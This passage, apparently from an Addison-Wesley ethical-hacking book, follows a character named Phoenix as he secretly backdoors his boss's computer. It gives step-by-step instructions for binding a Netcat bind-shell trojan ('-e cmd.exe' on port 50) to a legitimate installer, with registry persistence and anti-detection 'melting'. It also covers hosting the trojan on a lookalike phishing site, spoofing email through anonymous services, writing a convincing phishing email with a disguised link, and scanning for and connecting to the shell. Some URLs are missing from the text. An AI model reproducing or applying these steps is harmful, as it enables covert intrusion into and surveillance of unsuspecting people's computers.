Chapter 2: Discover What Your Boss is Looking At

Addison-Wesley Professional

1 2 3 Page 2
Page 2 of 3

Binding a Trojan with a legitimate executable is a common method hackers employ to trick users into installing malware onto their computers. These binding programs, also called Trojan wrappers, will combine the original program with a Trojan program and create a new executable. In this example, Phoenix uses Yet Another Binder (YAB), which was originally found at (This site no longer hosts YAB, but you can find this free utility through file-sharing services such as BitTorrent or another hacking Web site such as or

On starting YAB, Phoenix sees the screen shown in Figure 2.10.

Figure 2.10

Figure 2.10

Yet Another Binder

Phoenix clicks the plus sign to bring up the Add Bind File Command screen shown in Figure 2.11.

Figure 2.11

Figure 2.11

Adding Netcat

Phoenix sets up the options in Table 2.1 to prepare his Trojan for binding:

Table 2.1 Yet Another Binder Options




Select command to add:

Bind File

This option enables you to bind a file to another.

Source File Path:


This is the path to Phoenix’s Netcat Trojan.

Execution Method:

Execute asynchronously

This option installs the Trojan separately from the main executable. Sometimes trying to launch them both at the same time (synchronously) might cause problems, so asynchronous execution is a safer option.

Execution parameters:

-p 50 -e cmd.exe -L

This option configures Netcat to listen (-L) in the background for incoming connections to TCP port 50. The -e cmd.exe option tells Netcat to execute the MS-DOS command shell.

Optionally, Phoenix can select to launch the Trojan again when the computer starts up by setting the Registry Startup Method option. For example, Phoenix can configure it to load in HKEY_LOCAL_MACHINE\Microsoft\Windows\Current Version\Run so that the Trojan will launch every time the computer starts. The default value is not to modify the Registry.

Phoenix clicks OK after he finishes configuring Netcat. Next Phoenix adds the legitimate program by clicking the plus sign again to add it. He selects Execute File in the Select command to add drop-down box (see Figure 2.12). He enters the complete path to the backup.exe executable file, leaves the other options at their default, and then clicks OK.

Figure 2.12

Figure 2.12

Adding the executable

Before Phoenix binds the two files together, he first makes sure that all traces of the Netcat executable will be removed after it launches. This helps to prevent users from detecting his malware on their computer. Trojan wrappers often have this option to melt, or remove, all traces of the malware executable after the software is running in RAM. Although choosing to melt the file is ideal to avoid detection, it does have a side effect: If the file is gone, Phoenix cannot launch it again when the computer starts up. He chooses to melt Netcat by going to the Options menu and choosing Melt Stub After Execution (see Figure 2.13).

Figure 2.13

Figure 2.13

Melt Stub After Execution option

To make this Trojan appear legitimate, Phoenix selects an icon that looks like a standard install program. In the Icon Preview box, he clicks (none) to bring up the Change Icon dialog box. From here, he chooses an icon that looks like a standard install program. Icon 7 and Icon 8 are two good options (see Figure 2.14).

Figure 2.14

Figure 2.14

Choosing an icon

Now Phoenix is ready to bind the stub (Netcat) to the executable (backup.exe). He clicks the Bind File button. He now has his Trojan program, which he saves as setup.exe.

Because the installation is dependent on many other files, Phoenix needs to create a self-extracting archive that bundles all the files necessary for installation. He launches WinZip Self-Extractor and chooses Self-extracting Zip file for Software Installation (see Figure 2.15).

Figure 2.15

Figure 2.15

WinZip self-extractor

Phoenix selects Unzip automatically (see Figure 2.16) so that the archiving is transparent to the user. When the wizard prompts him for the name of the executable to launch when the unzipping process is complete, he chooses setup.exe (see Figure 2.17). When his boss launches the CCNA program, it will unzip the files and run setup.exe, which will install both the legitimate practice test software and Netcat. Netcat will run in the background and listen for incoming connections on TCP (Transmission Control Protocol) port 50.

Figure 2.16

Figure 2.16

Choosing to unzip automatically

Figure 2.17

Figure 2.17

Executing setup.exe on completion

Setting Up the Phishing Site

Phoenix now has created his new program to host on his phishing Web site. He gives his file the same name as the original program (ccna.exe) from the legitimate Web site, and copies it to the same directory where the first ccna.exe was located (overwriting it). He will need to copy all the phishing Web site files to a Web server that can host them. To make the phishing scam appear as legitimate as possible, he decides to register a domain name that is similar to the original Web site. The original Web site is, so he registers the domain Now he has a fully functional Web site with a name similar to that of the original Web site, along with a new Trojan that appears to be a legitimate practice test application.

By reusing the same Web site, Phoenix has broken copyright law. In addition, he might face further prosecution for any other instances of people downloading and running the malware that he created.

Sending Mr. Minutia an E-mail

Phoenix has copied a Web site, created a Trojan, and hosted a new Web site with a link to his Trojan. All of this won’t help him unless he can somehow direct his boss, Mr. Minutia, to visit and download his Trojan. The easiest way to do this is to send a spoofed e-mail to his boss that appears to come from the Web site Phoenix hosts. When his boss looks in the e-mail's From: field, he should see an e-mail address coming from the domain and not Phoenix’s e-mail address. Mr. Minutia can discover the real e-mail address only by looking at the e-mail header. Reading the e-mail header is something few people know how to do, and, even if they do, most rarely look at in their e-mail software.

Although Phoenix could send an e-mail using his e-mail client at his workplace, this would make it easy for him to be tracked down in the event that someone does look in the e-mail header. To cover his tracks, he uses an anonymous e-mail service such as His steps, then, are as follows:

  1. Register an anonymous e-mail at

  2. Create an e-mail that entices his boss to visit the phishing Web site and download the CCNA executable bound with the Trojan

  3. Change the From: field to an e-mail address with the domain

Registering an anonymous e-mail at is easy. Phoenix goes to and signs up for its free, anonymous e-mail. Unlike many e-mail services that require you to enter an alternative e-mail address, your postal address, or other personal information, sites such as do not. This anonymity protects Phoenix from investigators being able to track him down.

If a hacker wants further protection, the hacker can go through an anonymous proxy server. and TorPark are two such proxies.

Next, Phoenix uses the instructions to configure his e-mail client. He decides on Outlook Express.

You might be wondering why Phoenix needs to have an anonymous e-mail account if he is going to change the From: field. Changing the From: field is enough to trick the user, but not enough to trick an investigator looking in the e-mail header. To hide his identity, Phoenix changes both the From: field and uses an anonymous e-mail service.

Phoenix now creates an e-mail that should be convincing enough to socially engineer his boss into visiting his site and download the Trojan. A good phishing scam e-mail should follow these guidelines:

  • The e-mail should be checked for grammatical and spelling mistakes—People are less likely to trust an e-mail with many typographical errors because it appears unprofessional.

  • The e-mail should offer something free—Everyone likes something free.

  • The e-mail should explain why the victims are getting something for nothing—People know that nothing is really "free" and that there must be a catch. Without the justification for the free item, the victims might become suspicious. They might not necessarily think it is a phishing scam, but they might suspect that they are being tricked into something against their will. If you attempt to give something at no cost, the victims should know why they are getting something free.

  • The e-mail should leave the unsuspecting users feeling good about themselves—Your e-mail is essentially a marketing campaign trying to get your victim to download your software. With information technology professionals (such as Phoenix’s boss, in this scenario), the best approach is to leave them feeling that if they use your product they will be smarter and more successful than if they do not use your product.

  • The e-mail should be brief—People are less likely to read a long e-mail than a short one. Phoenix wants to keep the e-mail short to increase the chance of his boss reading it.

The following is a suggested e-mail that meets these objectives:

Subject: Free CCNA Practice Test Software

Dear Mr. Minutia,

Download your free CCNA practice test today while it lasts!

As an IT professional, you know being industry certified dramatically increases your net worth, your technical ability within your organization, and recognition from your colleagues. Our research has shown that professionals with the CCNA certification earn 15% more on average than those without the certification.

For a limited time, Certification Practice Exams is pleased to offer all registered users free CCNA practice test software. This is a $129 value! Why would we be willing to give away so much free? It’s simple. When you use our software to pass the CCNA exam on your first try, we're confident Certification Practice Exams will be your destination for future Cisco certification practice tests. We ask only that, after you pass your exam, you consider us for all future practice test needs.

To download your free CCNA practice test, go to and click the CCNA.exe link.


Certification Practice Exams

You might have noticed that the Web site URL is for the legitimate Web site and not the new phishing Web site that Phoenix created. This is intentional. Although Phoenix could have put in his domain name, a good phishing scam appears as legitimate as possible. This e-mail references the original Web site, but Phoenix has changed the HTML code to link to the phishing site. To do this, Phoenix goes to the source code of the e-mail and changes the link to point to his Web site at (see Figure 2.18). That way the e-mail text refers to the real Web site, but the code directs Phoenix's boss to the fake Web site. When he's on Phoenix’s Web site, Mr. Minutia will probably never notice that the Web site is different. And, even if he does, it is close enough to the real Web site domain that he probably will not even care.

Figure 2.18

Figure 2.18

Changing the link

To further encourage his boss, Phoenix approaches him and mentions that he has been thinking about going for the CCNA certification. By mentioning this certification, Phoenix drops a subtle suggestion in his boss’s mind about the certification exam. Gentle suggestions can go a long way toward social engineering the boss into downloading this software. Phoenix remarks, “I received an e-mail from one of those practice test companies today. Did you get one? I haven’t checked it out yet, but it looks like a really good site.” Because Mr. Minutia is a competitive person by nature, Phoenix takes this a step further and entices him to download the software by saying, “You know, I bet you I’ll finish my CCNA before you. I think I’ll go looking for some practice exam software tonight to start preparing.”

Phoenix sends the e-mail, sits back, and waits. After he receives the e-mail, Mr. Minutia will be enticed to download Phoenix’s software. Both the legitimate practice test and Netcat will install on Mr. Minutia's machine during the installation process. Netcat will be listening on port 50 for Phoenix's boss’s machine to connect.

Finding the Boss’s Computer

The next step is to discover the IP address used on Mr. Minutia’s computer. One method is to use a software tool called Angry IP Scanner (, which scans a range of IP addresses to discover which hosts are active. See Figure 2.19 for an example of scanning the range.

Figure 2.19

Figure 2.19

Angry IP Scanner

Now that Phoenix has a list of hosts on the network, he can use a port scanner to determine which hosts are listening on port 50 (the port he configured Netcat to listen on). Phoenix chooses Angry IP Scanner. Figure 2.20 shows the output of its port scanner. Notice that port 50, the port he specified Netcat to listen on, is open.

Figure 2.20

Figure 2.20

Angry IP Scanner port scanner output

Connecting to the Boss’s Computer

The boss’s computer is Now that Phoenix knows the IP address and has verified that TCP port 50 is open, he can connect to Mr. Minutia’s machine. Phoenix opens an MS-DOS command prompt on his computer and navigates to the directory where he has a copy of Netcat. He types in the following command to connect to his boss’s machine:

nc 50

Phoenix verifies the connection to his boss's computer using the built-in ipconfig utility. It shows (the IP address of his boss's computer), so he successfully connected to Mr. Minutia’s computer (as shown in Figure 2.21).

Figure 2.21

Figure 2.21

Connecting to Mr. Minutia’s computer

1 2 3 Page 2
Page 2 of 3
SD-WAN buyers guide: Key questions to ask vendors (and yourself)